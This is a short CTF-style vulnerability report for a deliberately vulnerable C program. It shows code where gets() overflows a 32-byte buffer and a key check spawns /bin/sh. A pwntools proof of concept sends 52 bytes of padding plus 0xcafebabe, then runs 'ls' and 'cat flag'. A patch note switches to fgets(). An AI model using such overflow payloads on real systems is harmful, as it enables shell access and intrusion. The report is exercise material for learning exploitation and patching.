[DotHat]First attack

[Noma-Libra]

• Version: v1.0
• Environment: Ubuntu 16.04 32 bit
• Location of Vulnerability: func() function in vuln.c

  char overflowme[32];
  printf("overflow me : ");
  gets(overflowme);   // smash me!
  if(key == 0xcafebabe){
  system("/bin/sh");
  }
  else{
  printf("Nah..\n");
  }

• Type of Vulnerability: Buffer Overflow
• Explanation of vulnerability:

The func() function gets the string without size checking. So I can put a string with a size of 32 or greater.

By doing that I can overwrite the memory space of key I fill the memory space before the memory address that key is stored with dummy value "A" and overwrite the key value with 0xcafebabe Then the program execute /bin/sh and I can execute any command

I attach the poc file

• Subsystem: Empty

  This project not use Open-Source-Software. So, this item is empty

• Proof of Concept:

  
  from pwn import *

p = process("./vuln")

payload = "A"*52 + "\xbe\xba\xfe\xca" p.sendline( payload ) p.sendline('ls') print(p.recv()) p.sendline('cat flag') print(p.recv()) p.close()

[blbi]

Patch report

• Commit ID : efefe13
• Cause of vulnerability : gets() function did't check the size of input string
• Explanation : I change the gets() function into fgets() function that checks the size of input string so there are no bof vulnerability now